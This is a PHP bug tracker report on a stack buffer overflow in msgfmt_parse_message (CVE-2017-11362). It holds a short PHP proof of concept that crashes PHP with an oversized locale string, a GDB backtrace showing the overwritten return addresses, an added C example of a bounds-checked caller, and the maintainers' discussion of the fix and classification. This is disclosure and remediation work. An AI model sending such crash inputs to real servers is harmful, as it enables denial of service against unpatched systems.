Bug #73473 Stack Buffer Overflow in msgfmt_parse_message
Submitted: 2016-11-07 10:40 UTC Modified: 2018-01-15 13:48 UTC
From: emmanuel dot law at gmail dot com Assigned: stas (profile)
Status: Closed Package: intl (PECL)
PHP Version: 7.0.12 OS: *
Private report: No CVE-ID: 2017-11362
 [2016-11-07 10:40 UTC] emmanuel dot law at gmail dot com
Description:
------------
There exists a stack overflow when parsing the locale in msgfmt_parse_message(). The vulnerability is being triggered in line 142, where an overly long slocale is being passed into libicu's umsg_open().

//php-7.0.12/ext/intl/msgformat/msgformat_parse.c
90 PHP_FUNCTION( msgfmt_parse_message )
91 {
92     UChar      *spattern = NULL;
93     int         spattern_len = 0;
....
141     /* Create an ICU message formatter. */
142     MSG_FORMAT_OBJECT(mfo) = umsg_open(spattern, spattern_len, slocale, NULL, &INTL_DATA_ERROR_CODE(mfo));
Test script:
---------------
<?php
 ini_set('memory_limit', -1);
 
 $boom  = str_repeat("A",2147483647+1);
 msgfmt_parse_message($boom,"ABC","EFG");

Actual result:
--------------
./php-7.0.12 test.php
Segmentation fault

====Digging into GDB====

gdb-peda$ continue
Continuing.
Program received signal SIGSEGV, Segmentation fault.
Stopped reason: SIGSEGV

gdb-peda$ backtrace
#0  __strcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:241
#1  0x00007ffff382368c in strcpy (__src=0x7fff6d400018 'A' <repeats 200 times>...,
    __dest=0x7fffffffa29d 'A' <repeats 200 times>...)
    at /usr/include/x86_64-linux-gnu/bits/string3.h:104
#2  icu_52::Locale::Locale (this=0x7fffffffa420,
    newLanguage=0x7fff6d400018 'A' <repeats 200 times>..., newCountry=0x0,
    newVariant=0x0, newKeywords=0x0) at locid.cpp:336
#3  0x4141414141414141 in ?? ()
#4  0x4141414141414141 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
.......
.....
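
The caller-side length check this report calls for, as an added example in C that is neither php-src's nor ICU's code: a modelled unbounded copy into a fixed stack buffer (the pattern the backtrace shows) beside a hardened caller that bounds and validates the locale before handing it on. The buffer capacity, MAX_LOCALE_LEN and the function names are assumptions; the repeated-'A' input is constructed to mirror the test script's str_repeat.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed capacity of the library's fixed stack buffer (ICU's ULOC_FULLNAME_CAPACITY, 157). */
#define MODEL_LOCALE_CAPACITY 157
/* Assumed caller-side bound, well below the buffer (php-intl's INTL_MAX_LOCALE_LEN is similar). */
#define MAX_LOCALE_LEN 80

/* Models the library path in the backtrace (Locale::Locale -> strcpy): unbounded copy into a fixed stack buffer. */
static size_t model_locale_ctor(const char *locale)
{
    char fullname[MODEL_LOCALE_CAPACITY];
    strcpy(fullname, locale);   /* the unchecked copy that overflows on long input */
    return strlen(fullname);
}

/* Hardened caller: rejects over-long locales and embedded NULs up front; returns -1 if rejected, else bytes copied. */
int msgfmt_open_checked(const char *locale, size_t locale_len)
{
    if (locale == NULL || locale_len > MAX_LOCALE_LEN)
        return -1;                          /* never reaches strcpy */
    if (memchr(locale, '\0', locale_len) != NULL)
        return -1;                          /* strcpy would see a different length */
    char tmp[MAX_LOCALE_LEN + 1];           /* bounded copy guarantees termination */
    memcpy(tmp, locale, locale_len);
    tmp[locale_len] = '\0';
    return (int)model_locale_ctor(tmp);
}

/* Constructed input: `len` repeated 'A' bytes (like the test script's str_repeat) through the checked caller. */
int probe_repeated_locale(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return -1;
    memset(s, 'A', len);
    s[len] = '\0';
    int rc = msgfmt_open_checked(s, len);
    free(s);
    return rc;
}

int main(void)
{
    printf("en_US -> %d\n", msgfmt_open_checked("en_US", 5));    /* 5 */
    printf("65536 x 'A' -> %d\n", probe_repeated_locale(65536)); /* -1 */
    return 0;
}
```

The over-long input is refused by the caller before any copy happens, which is the property the fix needs regardless of what the library buffer size actually is.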

History
 [2016-11-07 10:49 UTC] emmanuel dot law at gmail dot com
Here's my proposed patch:

https://gist.github.com/libnex/4f3382725b4020763af64c9a5e6acf5e
 [2016-11-18 14:41 UTC] krakjoe@php.net
-Type: Security +Type: Bug
 [2016-11-18 14:41 UTC] krakjoe@php.net
This issue does not meet the criteria to be considered a security issue.

Please review: https://wiki.php.net/security
 [2016-11-18 15:45 UTC] emmanuel dot law at gmail dot com
Isn't this similar to bug #73218, which was considered a security bug? Just wondering.
 [2017-06-02 22:01 UTC] nikic@php.net
@krakjoe: The security policy could use some clarification as to how length overflow bugs are classified. Right now both "low severity" and "not a security issue" could apply and I don't think we're handling these consistently.
 [2017-06-02 22:06 UTC] nikic@php.net
Automatic comment on behalf of emmanuel.law@gmail.com
Revision: http://git.php.net/?p=php-src.git;a=commit;h=95c4564f939c916538579ef63602a3cd31941c51
Log: Fixed bug #73473: Stack Buffer Overflow in msgfmt_parse_message
 [2017-06-02 22:06 UTC] nikic@php.net
-Status: Open +Status: Closed
 [2017-07-17 22:55 UTC] emmanuel dot law at gmail dot com
MITRE has assigned this CVE-2017-11362

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11362
 [2017-07-18 05:39 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2017-07-18 05:39 UTC] stas@php.net
I have no idea why this one was issued a CVE, it's not a security issue. Looks like practice of assigning CVEs to projects without any consultation with developers continues. Sigh.
 [2018-01-15 13:48 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2017-11362
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved.
Last updated: Wed Jan 29 20:02:31 2025 UTC